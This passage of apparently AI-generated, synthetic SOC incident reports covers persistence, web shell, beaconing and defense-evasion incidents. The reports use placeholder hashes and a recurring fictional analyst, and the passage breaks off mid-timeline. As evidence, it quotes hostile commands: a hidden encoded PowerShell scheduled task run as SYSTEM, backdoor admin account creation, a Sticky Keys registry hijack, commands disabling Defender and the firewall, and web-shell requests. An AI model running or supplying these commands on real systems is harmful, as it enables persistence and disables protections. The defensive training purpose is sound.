09:22 – PowerShell connects to C2
09:25 – Defender detects template modification
Persistence Mechanism:
File: Normal.dotm (global template for Word)
Macro: AutoOpen (runs automatically when Word starts)
Effect: Every time user opens Word, macro downloads and runs payload
Persistence: Survives reboots; triggers on application start
Macro Analysis:
AutoOpen macro downloads update.ps1 from 185.143.221[.]89
update.ps1 (SHA256: b2c3d4e5…) contains Cobalt Strike beacon
Beacon connects to same C2 on port 443
C2 Communication:
Established at 09:22
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
09:10 – Phishing email received
09:15 – User opens attachment
09:16-09:17 – Normal.dotm modified
09:20 – Word restarted (legitimate)
09:21-09:22 – Payload downloaded, C2 connected
09:25 – Defender alert
09:27 – SOC investigates
09:30 – Normal.dotm restored
Indicators of Compromise (IoCs):
Files:
– Normal.dotm (modified) – SHA256: a1b2c3d4…
– invoice.docm (original) – SHA256: b2c3d4e5…
– update.ps1 – SHA256: c3d4e5f6…
Network:
– C2: 185.143.221[.]89:80 (download), :443 (beacon)
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice Overdue”
4. Containment Actions:
Immediate Actions:
Restored Normal.dotm from backup (clean version).
Deleted invoice.docm and update.ps1.
Isolated host via Defender.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
Verified Word functions normally.
No reimage needed.
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User opened malicious document and enabled macros.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office from modifying templates.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Normal.dotm restored.
Malware removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Set Normal.dotm to read-only via GPO.
Enhanced monitoring for Office template modifications.
8. Conclusion:
A phishing email with a malicious macro modified the user’s Normal.dotm template, installing persistence that triggered every time Word started. Defender detected the template modification, enabling rapid restoration before significant C2 activity occurred.
Closure Rationale: Normal.dotm restored; malware removed; controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-18 10:30 EST
52. T1542 – Pre-OS Boot (HP Wolf Security Detection)
HP Wolf Security Alert Details
Alert ID: HP-WOLF-UEFI-1542-7842 Alert Time: 2024-02-18 14:30:22 EST Severity: CRITICAL (98/100) Source: HP Wolf Security (Hardware-Enforced Security) Rule: “UEFI Firmware Modification Detected” MITRE ATT&CK: T1542.001 – Pre-OS Boot: System Firmware
Alert Details:
Detection: UEFI firmware integrity check failed on boot
Host: EXEC-WS-001 (CEO’s Laptop – Surface Laptop 5) User: cjohnson (CEO) Time: 14:25 EST (boot time) Event: Secure Boot violation + firmware hash mismatch
UEFI Details:
Expected Firmware Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Firmware Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modification Time: Unknown (persists across reboots)
Secure Boot Status: Bypassed (keys modified)
HP Wolf Security Analysis:
Firmware modified to include malicious DXE driver
Driver loaded before OS: “BootkitDriver.efi”
Capabilities:
Injects malicious code into Windows boot process
Bypasses EDR/AV (runs before OS)
Establishes persistence even after OS reinstall
Can disable Secure Boot and other protections
Additional Context:
Laptop was physically unattended for 30 minutes yesterday
Hotel room during business trip (possible physical access)
No signs of OS-level compromise (CrowdStrike clean)
HP Sure Start detected and blocked boot
System prevented from booting (bricked as protection)
Threat Intelligence:
Similar to “BlackLotus” UEFI bootkit campaign
Requires physical access or admin privileges to install
Extremely sophisticated, nation-state level
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify HP Wolf alert
HP Wolf Security Console
Confirmed UEFI firmware compromise
2. Physical Security
Investigate physical access
Travel logs, Security
CEO was in hotel; laptop unattended in room
3. Device Quarantine
Isolate device (already bricked)
HP Sure Start
Device prevented from booting (safe)
4. Forensic Analysis
Extract compromised firmware
HP Security Team
Firmware contains BlackLotus bootkit
5. Replacement
Replace laptop
IT Hardware Team
New laptop provisioned with clean firmware
6. Credential Rotation
Rotate CEO’s credentials
Azure AD, Okta
All passwords reset; MFA re-enrolled
Jira Incident Report
Ticket: SOC-2024-092 Summary: T1542 – UEFI Firmware Compromise (BlackLotus Bootkit) Status: RESOLVED Resolution: MALICIOUS – Device Bricked and Replaced Priority: P1 – CRITICAL Labels: T1542, pre-os-boot, uefi, firmware, bootkit, hp-wolf, executive Components: Hardware-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: HP Wolf Security (Hardware-Enforced Security).
Alert: “UEFI Firmware Integrity Check Failed”.
Host: EXEC-WS-001 (CEO’s Laptop).
User: cjohnson (CEO).
Time: 2024-02-18 14:30 EST.
Technique: MITRE ATT&CK T1542.001 – Pre-OS Boot: System Firmware.
2. Technical Analysis:
Attack Chain:
2024-02-17, 19:00 – CEO checks into hotel, leaves laptop in room
19:00-19:30 – Unknown individual gains physical access to room
19:15 – Attacker boots from USB with firmware flashing tool
19:20 – Malicious UEFI firmware flashed (BlackLotus bootkit)
19:25 – Attacker leaves, laptop appears normal
2024-02-18, 08:00 – CEO uses laptop normally (bootkit active)
14:25 – CEO reboots laptop after update
14:25 – HP Sure Start detects firmware hash mismatch
14:25 – Boot blocked; system bricked (protection)
14:30 – HP Wolf Security alerts SOC
Bootkit Analysis:
Name: BlackLotus UEFI Bootkit
Installation: Requires physical access or admin privileges
Persistence: Survives OS reinstallation, disk replacement
Capabilities:
Disables Secure Boot
Injects into Windows boot process
Loads before EDR/AV
Can re-infect OS even after clean install
Establishes C2 early in boot process
Impact:
Bootkit active for approximately 6 hours
No C2 communication observed (firewall logs)
No data exfiltration detected
Device bricked before further compromise
3. Investigation Findings:
Timeline:
02-17 19:00 – Laptop unattended in hotel
02-17 19:15 – Firmware flashed (estimated)
02-18 08:00-14:00 – Normal use (bootkit active)
02-18 14:25 – Reboot triggers HP detection
02-18 14:25 – Device bricked (protection)
02-18 14:30 – Alert triggers
02-18 14:35 – SOC investigates
02-18 15:00 – Replacement laptop provisioned
Indicators of Compromise (IoCs):
Firmware:
– Compromised UEFI hash: a1b2c3d4…
– Malicious driver: BootkitDriver.efi
Physical:
– Hotel: Marriott Downtown, Room 1247
– Time window: 02-17 19:00-19:30
4. Containment Actions:
Immediate Actions:
Device already bricked (safe state).
Isolated from network (already off).
CEO credentials rotated.
Hotel security notified.
Device Replacement:
New laptop provisioned with verified clean firmware.
BIOS password enabled.
HP Sure Start enabled and configured.
Physical Security:
CEO briefed on physical security risks.
Company policy updated: never leave devices unattended in hotels.
GPS tracking enabled on executive devices.
5. Root Cause Analysis:
Primary Cause: Physical access to unattended device in hotel.
Contributing Factors:
No BIOS password on device.
Device left unattended.
Sophisticated attacker with UEFI flashing capability.
6. Business Impact:
Operational Impact: CEO offline for 1 hour (laptop replacement).
Data Exposure: None (device bricked before exfiltration).
Reputational Impact: Internal only.
Financial Impact: Cost of laptop replacement.
7. Remediation & Prevention:
Completed Actions:
Compromised device bricked and replaced.
CEO credentials rotated.
Physical security briefing conducted.
Technical Controls Enhanced:
BIOS password enforced on all executive devices.
HP Sure Start enabled with strict enforcement.
Physical tracking enabled on all laptops.
Policy updated: devices must be secured or with user at all times.
8. Conclusion:
The CEO’s laptop was physically compromised in a hotel room, with an attacker installing a BlackLotus UEFI bootkit via firmware flashing. HP Wolf Security detected the firmware modification on next boot and bricked the device, preventing further compromise. No data was exfiltrated.
Closure Rationale: Device replaced; credentials rotated; physical security enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-18 16:00 EST
53. T1053.005 – Scheduled Task (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SCHTASK-1053-7842 Alert Time: 2024-02-18 11:30:45 EST Severity: HIGH (82/100) Source: Splunk Enterprise Security Rule: “Scheduled Task Created with SYSTEM Privileges” MITRE ATT&CK: T1053.005 – Scheduled Task
Alert Details:
Correlated Events:
Windows Event ID 4698 (Scheduled Task Created):
Time: 11:25 EST
Host: HR-WS-045 (HR Department)
User: SYSTEM
Task Name: “WindowsUpdateTask”
Task XML:
Event ID 4688 (Process Creation):
Time: 11:26 EST
Process: schtasks.exe
Command: schtasks /create /tn “WindowsUpdateTask” /tr “powershell -WindowStyle Hidden -Enc JABjAGwAaQ…” /ru SYSTEM /sc HOURLY
Network Connection:
Time: 11:30 EST
Process: powershell.exe
Destination: 192.168.34.56:443
Detection Logic:
Task created with SYSTEM privileges
Name mimics Windows Update
Encoded PowerShell command (reverse shell)
Created by suspicious process (not legitimate Windows Update)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed malicious scheduled task creation
2. Command Decoding
Decode PowerShell command
PowerShell, CyberChef
Reverse shell to 192.168.34.56:443
3. Immediate Action
Disable and delete task
schtasks /delete
Task removed
4. Process Investigation
Find source of task creation
CrowdStrike
PowerShell from compromised user account
5. User Remediation
Reset affected user password
Azure AD, AD
Password reset; MFA enforced
6. Threat Hunting
Check for similar tasks
Splunk, CrowdStrike
No other tasks found
Jira Incident Report
Ticket: SOC-2024-093 Summary: T1053.005 – Scheduled Task Persistence with Reverse Shell Status: RESOLVED Resolution: MALICIOUS – Task Removed Priority: P2 – MEDIUM Labels: T1053, scheduled-task, persistence, splunk, reverse-shell Components: Endpoint-Security, Persistence
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Scheduled Task Created with SYSTEM Privileges”.
Host: HR-WS-045 (HR Department).
Task: “WindowsUpdateTask” (malicious).
Time: 2024-02-18 11:30 EST.
Technique: MITRE ATT&CK T1053.005 – Scheduled Task.
2. Technical Analysis:
Attack Chain:
11:15 – User opens phishing email with malicious link
11:16 – PowerShell downloads and executes payload
11:18 – Payload enumerates system, finds user has admin rights
11:20 – PowerShell creates scheduled task with SYSTEM privileges
11:25 – Task creation logged
11:26 – schtasks command executed
11:30 – First task trigger (hourly)
11:30 – Reverse shell connects to 192.168.34.56:443
11:30 – Splunk alert triggers
Scheduled Task Details:
Name: WindowsUpdateTask (masquerading)
Trigger: Hourly (persistence)
Run As: SYSTEM (highest privileges)
Action: PowerShell encoded reverse shell
Reverse Shell Analysis:
Decoded command: reverse shell to 192.168.34.56:443
Interactive PowerShell session
C2 IP: 192.168.34.56 (internal – compromised engineering host)
User Account:
User had local admin rights (should be standard user)
Account used to create SYSTEM task
3. Investigation Findings:
Timeline:
11:15 – Phishing email opened
11:20-11:26 – Task created
11:30 – First execution, C2 connection
11:30 – Alert triggers
11:32 – SOC investigates
11:35 – Task deleted
Indicators of Compromise (IoCs):
Task:
– Name: WindowsUpdateTask
– Action: powershell -WindowStyle Hidden -Enc JABjAGwAaQ…
Network:
– C2: 192.168.34.56:443
User:
– HR user with admin rights (excessive)
4. Containment Actions:
Immediate Actions:
Deleted scheduled task via schtasks /delete.
Terminated reverse shell process.
Isolated host temporarily.
Blocked C2 IP at firewall.
User Remediation:
Removed user’s admin rights.
Reset password.
Phishing training assigned.
Host Remediation:
Full scan (no other malware).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User with admin rights clicked phishing link.
Contributing Factors:
User had excessive privileges (local admin).
No application control blocking PowerShell.
No alerting on scheduled task creation.
6. Business Impact:
Operational Impact: HR workstation offline for 1 hour.
Data Exposure: None (C2 internal, no data sent).
7. Remediation & Prevention:
Completed Actions:
Task deleted.
User admin rights removed.
C2 blocked.
Technical Controls Enhanced:
Removed admin rights from all standard users.
Created alert for any scheduled task creation.
Enhanced PowerShell logging.
8. Conclusion:
A user with admin rights clicked a phishing link, leading to the creation of a scheduled task with SYSTEM privileges running a reverse shell hourly. Splunk detected the task creation, enabling rapid removal before significant C2 activity.
Closure Rationale: Task removed; user privileges reduced; controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-18 12:30 EST
54. T1015 – Accessibility Features (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-ACCESSIBILITY-1015-7842 Alert Time: 2024-02-18 15:30:15 EST Severity: HIGH (88/100) Source: Sysmon (Event ID 1 – Process Creation) Rule: “Sethc.exe (Sticky Keys) Process Creation – Potential Persistence” MITRE ATT&CK: T1015 – Accessibility Features
Alert Details:
Event ID: 1 (Process Creation) Time: 15:25 EST Host: SEC-WS-023 (Security Team Workstation) User: SYSTEM (via Winlogon)
Process Tree:
winlogon.exe (PID: 568 – SYSTEM)
sethc.exe (PID: 7842 – SYSTEM)
Command: C:\Windows\System32\cmd.exe (PID: 7845)
Command: whoami (confirmed SYSTEM)
Command: net user attacker Password123! /add
Command: net localgroup administrators attacker /add
Registry Artifacts (Sysmon Event 13):
Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
Value: Debugger
Data: C:\Windows\System32\cmd.exe
Modified: 15:20 EST
Modified By: powershell.exe (PID: 4789)
Detection Logic:
sethc.exe (Sticky Keys) normally runs when Shift key pressed 5 times
Registry configured to launch cmd.exe instead (Debugger trick)
Pressing Shift 5 times now launches SYSTEM command prompt
Classic persistence technique for physical access
Additional Context:
User was at desk, accidentally pressed Shift key 5 times
Unexpected command prompt appeared
User reported immediately to security
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed accessibility feature abuse
2. Registry Remediation
Remove Debugger registry key
reg delete
Debugger key removed
3. User Account Check
Check for unauthorized accounts
AD Users and Computers
Attacker account found and disabled
4. Account Remediation
Delete attacker account
net user
Attacker account deleted
5. User Interview
Contact user
Teams, Phone
User reported Shift key press; helped
6. Threat Hunting
Check other hosts for same registry
Splunk, Sysmon
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-094 Summary: T1015 – Sticky Keys Accessibility Feature Abuse for Persistence Status: RESOLVED Resolution: MALICIOUS – Registry Key Removed Priority: P2 – MEDIUM Labels: T1015, accessibility-features, sticky-keys, persistence, sysmon Components: Endpoint-Security, Persistence
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “Sethc.exe (Sticky Keys) Process Creation – Potential Persistence”.
Host: SEC-WS-023 (Security Team Workstation).
User: SYSTEM (via winlogon).
Time: 2024-02-18 15:30 EST.
Technique: MITRE ATT&CK T1015 – Accessibility Features.
2. Technical Analysis:
Attack Chain:
14:00 – Attacker gains remote access via compromised credentials
14:15 – Attacker runs PowerShell to modify registry
14:20 – Registry key modified: sethc.exe debugger set to cmd.exe
14:20 – Attacker account “attacker” created
14:20 – Attacker added to local administrators group
14:20-15:25 – Attacker idle (waiting)
15:25 – User accidentally presses Shift key 5 times
15:25 – cmd.exe launches as SYSTEM
15:25 – User sees command prompt, reports immediately
15:30 – Sysmon alerts
Persistence Mechanism:
Accessibility Feature: Sticky Keys (sethc.exe)
Registry Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
Value: Debugger
Data: C:\Windows\System32\cmd.exe
Effect: Pressing Shift 5 times launches SYSTEM command prompt
Attacker Account:
Username: attacker
Password: (complex, known to attacker)
Privileges: Local administrator
Status: Created 15:20, not used yet
User Discovery:
User pressed Shift keys accidentally while typing
Unexpected SYSTEM command prompt appeared
User reported immediately to security (excellent response)
3. Investigation Findings:
Timeline:
14:20 – Registry modified, account created
15:25 – User triggers accessibility feature
15:25 – User reports incident
15:30 – Sysmon alert
15:32 – SOC investigates
15:35 – Registry key removed
15:36 – Attacker account deleted
Indicators of Compromise (IoCs):
Registry:
– HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = “C:\Windows\System32\cmd.exe”
Account:
– attacker (local admin)
Process:
– sethc.exe spawning cmd.exe
4. Containment Actions:
Immediate Actions:
Removed Debugger registry key.
Deleted attacker account.
Scanned host for other persistence (none).
Verified no other registry modifications.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
User commended for reporting.
User educated on physical security.
5. Root Cause Analysis:
Primary Cause: Attacker gained remote access and modified registry for persistence.
Contributing Factors:
Compromised credentials allowed remote access.
No monitoring for accessibility feature abuse.
Classic persistence technique not blocked.
6. Business Impact:
Operational Impact: Security workstation offline for 1 hour.
Security Impact: Attacker had local admin access for 1 hour.
Data Exposure: None (attacker idle, no activity).
7. Remediation & Prevention:
Completed Actions:
Registry key removed.
Attacker account deleted.
Host secured.
Technical Controls Enhanced:
Created alert for any Image File Execution Options modifications.
Blocked remote registry modifications via GPO.
Enforced application whitelisting.
8. Conclusion:
An attacker used remote access to modify the registry, enabling the Sticky Keys accessibility feature to launch a SYSTEM command prompt. The user accidentally triggered the feature and reported immediately. Sysmon detected the anomalous process creation, enabling rapid remediation. No further compromise occurred.
Closure Rationale: Registry key removed; attacker account deleted; controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-18 16:30 EST
55. T1505 – Server Software Component (Imperva Detection)
Imperva Alert Details
Alert ID: IMPERVA-WEB-SHELL-1505-7842 Alert Time: 2024-02-18 10:30:22 EST Severity: CRITICAL (95/100) Source: Imperva Web Application Firewall + RASP Rule: “Web Shell Detected on Server” MITRE ATT&CK: T1505.003 – Server Software Component: Web Shell
Alert Details:
Detection: Malicious file uploaded to web server – PHP web shell
Server: WEB-SRV-045 (Public-Facing Web Server) Application: Company Portal (PHP) Time: 10:25 EST
File Details:
Path: /var/www/html/uploads/images.php
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Size: 2.3 KB
Upload Time: 10:23 EST
Uploaded Via: HTTP POST to /uploads/upload.php
Source IP: 185.143.221[.]89 (Bulgaria)
Web Shell Analysis:
File Type: PHP web shell (“WSO” – Web Shell by oRb)
Capabilities:
Execute system commands
Upload/download files
Browse file system
Database queries
Reverse shell
Obfuscated: Base64 encoded functions
Password Protected: “attacker123”
Access Logs:
10:24 EST – GET /uploads/images.php?action=cmd&cmd=whoami
Result: www-data
10:24 EST – GET /uploads/images.php?action=cmd&cmd=id
Result: uid=33(www-data) gid=33(www-data)
10:25 EST – GET /uploads/images.php?action=cmd&cmd=uname -a
Result: Linux web-server 5.4.0
10:25 EST – Imperva detects and blocks
Additional Context:
File upload functionality intended for images only
No validation on file type (vulnerability)
Web server accessed from Bulgaria (unusual)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Imperva alert
Imperva Console
Confirmed web shell upload and access
2. Immediate Action
Remove web shell
SSH, File System
images.php deleted
3. Block IP
Block attacker IP
Imperva WAF, Firewall
IP 185.143.221[.]89 blocked
4. Vulnerability Assessment
Identify upload vulnerability
Code Review, Scanner
File upload allowed PHP files; patched
5. Log Review
Check for data access
Web Logs, Database Logs
No database access; file system browsed
6. Credential Rotation
Rotate any exposed credentials
DevOps Team
Database credentials rotated
Jira Incident Report
Ticket: SOC-2024-095 Summary: T1505 – PHP Web Shell Uploaded to Public Web Server Status: RESOLVED Resolution: MALICIOUS – Web Shell Removed Priority: P1 – CRITICAL Labels: T1505, web-shell, server-component, imperva, php Components: Web-Security, Server-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Imperva Web Application Firewall + RASP.
Alert: “Web Shell Detected on Server”.
Server: WEB-SRV-045 (Public-Facing Web Server).
File: /var/www/html/uploads/images.php (WSO web shell).
Time: 2024-02-18 10:30 EST.
Technique: MITRE ATT&CK T1505.003 – Server Software Component: Web Shell.
2. Technical Analysis:
Attack Chain:
10:20 – Attacker scans for vulnerable file upload endpoints
10:21 – Discovers /uploads/upload.php (no file type validation)
10:22 – Attacker crafts PHP web shell named images.php
10:23 – Uploads images.php via HTTP POST
10:23 – File saved to /var/www/html/uploads/images.php
10:24 – Attacker accesses web shell, runs reconnaissance commands
10:24 – whoami, id, uname -a executed
10:25 – Imperva detects web shell signature
10:25 – Imperva blocks further access
Web Shell Analysis:
Type: WSO (Web Shell by oRb) – popular PHP web shell
Password: “attacker123” (required for access)
Capabilities:
Command execution (via system, shell_exec)
File upload/download
File system navigation
Database queries
Reverse shell creation
Obfuscation: Base64 encoded functions to evade detection
Attacker Activity:
Reconnaissance only (3 commands)
No file downloads
No database access
No persistence installed
Vulnerability:
File upload script allowed PHP files
No file type validation
No authentication on upload endpoint
3. Investigation Findings:
Timeline:
10:23 – Web shell uploaded
10:24 – Attacker reconnaissance
10:25 – Imperva detects and blocks
10:26 – Web shell removed
10:30 – Alert triggers
Indicators of Compromise (IoCs):
Files:
– /var/www/html/uploads/images.php (SHA256: a1b2c3d4…)
Network:
– Attacker IP: 185.143.221[.]89
– URLs:
– POST /uploads/upload.php
– GET /uploads/images.php?action=cmd&cmd=whoami
4. Containment Actions:
Immediate Actions:
Deleted images.php from server.
Blocked attacker IP at WAF and firewall.
Verified no other web shells present.
Vulnerability Remediation:
Patched upload.php to validate file types (images only).
Implemented file extension whitelist.
Added authentication to upload endpoint.
Credential Rotation:
Rotated database credentials (as precaution).
Rotated any service account passwords.
5. Root Cause Analysis:
Primary Cause: Insecure file upload allowing PHP files.
Contributing Factors:
No file type validation on upload.
Upload endpoint publicly accessible without auth.
No WAF rules blocking web shells (until now).
6. Business Impact:
Operational Impact: Web server offline for 30 minutes.
Data Exposure: None (recon only).
Reputational Impact: None (contained quickly).
7. Remediation & Prevention:
Completed Actions:
Web shell removed.
Vulnerability patched.
Attacker IP blocked.
Technical Controls Enhanced:
Implemented file type validation on all uploads.
Added authentication to upload endpoints.
Deployed Imperva RASP for runtime web shell detection.
Created WAF rule to block web shell signatures.
8. Conclusion:
An attacker exploited an insecure file upload to place a PHP web shell on a public web server. They performed basic reconnaissance before Imperva detected and blocked the web shell. The file was removed, and the vulnerability patched. No data was accessed or exfiltrated.
Closure Rationale: Web shell removed; vulnerability patched; attacker blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-18 11:30 EST
End of Batch 11 (Revised)
Ready for your next batch of prompts whenever you are.
Batch 12: Defense Evasion & Command and Control Incident Reports
Here are the next 5 detailed SOC incident reports.
56. T1205 – Traffic Signaling (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-TRAFFIC-SIG-1205-7842 Alert Time: 2024-02-19 09:30:22 EST Severity: HIGH (85/100) Source: Darktrace Enterprise Immune System Rule: “Unusual Beaconing Pattern – Potential C2 Signaling” MITRE ATT&CK: T1205 – Traffic Signaling
Alert Details:
Detection: Anomalous network traffic pattern consistent with C2 signaling
Host: DEV-WS-078 (Development Workstation) User: alexchen (Alex Chen, Developer) Time: 09:15-09:30 EST
Traffic Pattern Analysis:
Destination: 185.143.221[.]89:8443 (Bulgaria)
Protocol: HTTPS with custom certificate
Pattern: 12 connections at precise 60-second intervals
Packet sizes: Exactly 512 bytes each (consistent)
Timing: Jitter-free (not human)
Darktrace Anomaly Scoring:
Unusual External Destination: 85/100
Beaconing Behavior: 92/100
Packet Size Consistency: 88/100
Overall Threat Score: 88/100
Additional Context:
Host normally connects to US/EU only
No business need for Bulgaria connection
Connection started at 09:15, continues
Destination IP known for Cobalt Strike C2
Threat Intelligence:
IP 185.143.221[.]89 associated with TA577
Port 8443 commonly used for C2 bypass
Pattern matches “Malleable C2” profiles
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Darktrace anomaly
Darktrace Console
Confirmed beaconing pattern to suspicious IP
2. Process Investigation
Identify process making connections
CrowdStrike Falcon
svchost.exe with injected code (PID: 3421)
3. Memory Analysis
Extract and analyze injected code
CrowdStrike Sandbox
Cobalt Strike beacon with custom sleep pattern
4. Immediate Action
Isolate host
CrowdStrike
Host quarantined
5. C2 Blocking
Block destination IP
Palo Alto Firewall
IP 185.143.221[.]89 blocked
6. Threat Hunting
Check for same beacon pattern
Darktrace, Splunk
No other hosts with same pattern
Jira Incident Report
Ticket: SOC-2024-096 Summary: T1205 – Cobalt Strike Beaconing Detected via Traffic Signaling Status: RESOLVED Resolution: MALICIOUS – C2 Communication Blocked Priority: P2 – MEDIUM Labels: T1205, traffic-signaling, beaconing, cobalt-strike, darktrace Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Unusual Beaconing Pattern – Potential C2 Signaling”.
Host: DEV-WS-078 (Development Department, user alexchen).
Time: 2024-02-19 09:30 EST.
Technique: MITRE ATT&CK T1205 – Traffic Signaling.
2. Technical Analysis:
Attack Chain:
08:45 – User clicked phishing link in email
08:46 – Malware downloaded and executed
08:47 – Malware injected into svchost.exe
09:15 – First C2 beacon after sleep interval
09:15-09:30 – 12 beacons at 60-second intervals
09:30 – Darktrace detects anomalous pattern
Beacon Analysis:
C2 IP: 185.143.221[.]89:8443
Protocol: HTTPS with custom certificate
Beacon Interval: Exactly 60 seconds (no jitter)
Packet Size: Exactly 512 bytes each
Pattern: Consistent, machine-generated (not human)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe (living off the land)
Sleep Pattern: Customizable in Malleable C2 profile
Capabilities: Keylogging, screenshot capture, file exfiltration
User Activity:
User clicked link in email about “code repository access”
Believed it was legitimate
No immediate signs of compromise
3. Investigation Findings:
Timeline:
08:45 – User clicks phishing link
08:46-08:47 – Malware installation
09:15 – Beaconing begins
09:30 – Darktrace alert
09:32 – SOC investigates
09:35 – Host isolated
09:36 – C2 IP blocked
Indicators of Compromise (IoCs):
Network:
– C2 IP: 185.143.221[.]89:8443
– Beacon Pattern: 60-second intervals, 512-byte packets
Process:
– svchost.exe (injected) – PID 3421
File:
– Initial dropper (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Isolated host via CrowdStrike.
Blocked C2 IP at firewall.
Terminated malicious svchost.exe process.
Scanned for persistence (none found).
Malware Removal:
Removed injected code from svchost.exe.
Deleted initial dropper.
Full scan (clean).
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No ASR rule blocking Office child processes.
PowerShell allowed to download and execute.
User lacked recent training.
6. Business Impact:
Operational Impact: Developer workstation offline for 2 hours.
Data Exposure: None (C2 contained before data exfil).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule blocking script execution.
Enhanced Darktrace monitoring for beacon patterns.
Deployed additional EDR detection for process injection.
8. Conclusion:
A developer clicked a phishing link, leading to Cobalt Strike infection. The malware established C2 beaconing with precise 60-second intervals. Darktrace detected the anomalous traffic pattern, enabling rapid containment before data exfiltration.
Closure Rationale: Malware removed; C2 blocked; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 10:30 EST
57. T1562 – Impair Defenses (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-DEFENSE-IMPAIR-1562-7842 Alert Time: 2024-02-19 14:15:33 EST Severity: CRITICAL (95/100) Source: Microsoft Defender for Endpoint Rule: “Tampering with Defender Security Settings Detected” MITRE ATT&CK: T1562.001 – Impair Defenses: Disable or Modify Tools
Alert Details:
Detection: Attempt to disable Windows Defender real-time protection
Host: IT-WS-112 (IT Department) User: bjones (Brian Jones – IT Admin) Time: 14:10 EST
PowerShell Commands Executed:
1. 14:08:22 – Set-MpPreference -DisableRealtimeMonitoring $true
2. 14:08:25 – Set-MpPreference -DisableBehaviorMonitoring $true
3. 14:08:28 – Set-MpPreference -DisableBlockAtFirstSeen $true
4. 14:08:31 – Set-MpPreference -DisableIOAVProtection $true
5. 14:08:34 – Set-MpPreference -DisablePrivacyMode $true
6. 14:08:37 – Set-MpPreference -MAPSReporting Disabled
7. 14:08:40 – Add-MpPreference -ExclusionPath C:\Users\bjones\AppData\Local\Temp
8. 14:08:43 – Add-MpPreference -ExclusionProcess malware.exe
9. 14:08:46 – Add-MpPreference -ExclusionExtension .exe
10. 14:08:49 – netsh advfirewall set allprofiles state off
Process Tree:
explorer.exe (PID: 2341)
powershell.exe (PID: 4789)
Executing above commands
cmd.exe (PID: 4792)
netsh firewall disable command
Detection Logic:
Multiple Defender disable commands in quick succession
Firewall disabled immediately after
User bjones is IT admin (legitimate access)
But pattern matches attacker disabling defenses
Additional Context:
bjones reported receiving “security alert” email 10 minutes prior
Clicked link, entered credentials
Account may be compromised
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed defense impairment attempts
2. User Verification
Contact bjones
Teams, Phone
User did NOT run these commands; account compromised
3. Immediate Action
Disable compromised account
Azure AD, AD
bjones account disabled
4. Re-enable Defenses
Re-enable Defender settings
PowerShell, Intune
All protections restored
5. Firewall Restore
Re-enable Windows Firewall
netsh, GPO
Firewall re-enabled
6. Account Remediation
Reset password, enforce MFA
Azure AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-097 Summary: T1562 – Attemp to Disable Defender and Firewall via Compromised Admin Account Status: RESOLVED Resolution: MALICIOUS – Defenses Restored Priority: P1 – CRITICAL Labels: T1562, impair-defenses, defender-tampering, firewall, compromised-admin Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Tampering with Defender Security Settings Detected”.
Host: IT-WS-112 (IT Department, user bjones).
Time: 2024-02-19 14:15 EST.
Technique: MITRE ATT&CK T1562.001 – Impair Defenses: Disable or Modify Tools.
2. Technical Analysis:
Attack Chain:
13:55 – bjones receives phishing email “Security Alert – Action Required”
13:56 – Clicks link, enters credentials on fake Microsoft login page
13:57 – Attacker logs in from IP 45.134.225[.]78
